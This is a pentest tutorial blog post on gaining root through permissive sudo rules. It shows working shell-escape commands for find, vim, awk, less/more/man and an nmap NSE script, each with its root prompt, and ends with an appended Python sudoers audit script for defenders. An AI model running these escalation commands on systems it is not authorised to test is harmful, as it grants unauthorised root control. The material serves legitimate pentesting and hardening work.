Exploiting SUDO for Linux privilege escalation
Abusing SUDO for fun and profit!
The SUDO (Substitute User and Do) command allows privilege delegation: users can execute specific commands as other users (including root), authenticating with their own password rather than the target user's, or with no password at all, depending on the settings in the /etc/sudoers file.
For more information about sudoers configuration, please refer to the official documentation.
So, if during a pentest you have been able to obtain a shell without root privileges, you could try to perform a privilege escalation using SUDO, exploiting some functionality of the applications allowed to be executed under SUDO.
In order to exploit sudo, first you need to find which commands the current user is allowed to run, using the sudo -l command:
andrea@viserion:~$ sudo -l
Matching Defaults entries for andrea on viserion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User andrea may run the following commands on viserion:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/awk
In this case, three commands are allowed to be executed with root permissions, so we can try to obtain a privileged shell using some features of these commands.
For example, we can exploit the -exec parameter of the find command:
andrea@viserion:~$ sudo find /etc/passwd -exec /bin/sh \;
# whoami
root
#
or the -c parameter of vim:
andrea@viserion:~$ sudo vim -c '!sh'
# whoami
root
#
awk also allows invoking a shell:
andrea@viserion:~$ sudo awk 'BEGIN {system("/bin/sh")}'
# whoami
root
#
and less, more and man allow command execution, as the less help screen shows:
MISCELLANEOUS COMMANDS

  -<flag>      Toggle a command line option [see OPTIONS below].
  --<name>     Toggle a command line option, by name.
  _<flag>      Display the setting of a command line option.
  __<name>     Display the setting of an option, by name.
  +cmd         Execute the less cmd each time a new file is examined.

  !command     Execute the shell command with $SHELL.
  |Xcommand    Pipe file between current pos & mark X to shell command.
  v            Edit the current file with $VISUAL or $EDITOR.
  V            Print version number of "less".
so, simply run
sudo less /etc/hosts or sudo more /etc/hosts or sudo man ls
then type !sh and hit enter.
Finally, a more laborious approach using a custom Nmap NSE script:
andrea@viserion:~$ echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

Starting Nmap 6.40 ( http://nmap.org ) at 2018-04-24 10:41 DST
# whoami
root
#
A lot of other tools allow command execution, and these tools could be included in the sudo configuration.
Basically, imagination is the only limit: sysadmins should frequently double-check the sudoers configuration in order to avoid this kind of privilege escalation.
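As an added defensive check, not part of the original post: a small Python audit that parses sudoers-style rules and flags entries granting ALL or one of the shell-escape-capable binaries discussed above (find, vim, awk, less, more, man, nmap). The binary list and the sample sudoers content are constructed for this example; the sample mirrors the sudo -l output shown earlier.

```python
import os
import re
from typing import List, NamedTuple

# Binaries the post demonstrates as offering a shell escape when run via sudo
# (find -exec, vim -c, awk system(), less/more/man '!', nmap --script).
# This list is an assumption for the example; extend it for your environment.
SHELL_ESCAPE_BINARIES = {"find", "vim", "vi", "awk", "less", "more", "man", "nmap"}

# Common sudoers rule shape:  user  host=(runas) TAG: cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Constructed sample, modelled on the sudo -l output shown in the post.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults        env_reset, mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
andrea  viserion=(root) NOPASSWD: /usr/bin/find, /usr/bin/vim, /usr/bin/awk
deploy  ALL=(root) /usr/bin/systemctl restart nginx
backup  ALL=(ALL) NOPASSWD: ALL
"""


class Finding(NamedTuple):
    user: str
    runas: str
    nopasswd: bool
    command: str
    reason: str


def audit_sudoers(text: str) -> List[Finding]:
    """Flag rules that grant an unrestricted command or a binary with a known shell escape."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        # Drop comments (this also skips #include directives) and blank lines.
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        if user == "root":  # root already has everything; not a finding
            continue
        runas = m.group("runas") or "root"  # sudoers defaults the run-as user to root
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append(Finding(user, runas, nopasswd, cmd, "unrestricted command"))
                continue
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append(Finding(user, runas, nopasswd, cmd, f"{binary} offers a shell escape"))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        auth = "NOPASSWD" if f.nopasswd else "password"
        print(f"{f.user} -> ({f.runas}) {auth}: {f.command}  [{f.reason}]")
```

Run it against a copy of /etc/sudoers (and the files under /etc/sudoers.d) rather than the embedded sample; any finding with NOPASSWD and a shell-escape binary is exactly the situation the post describes and should be replaced by a tighter rule or a wrapper script that does not expose the interactive features.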
References and further readings
feature image from https://xkcd.com/149/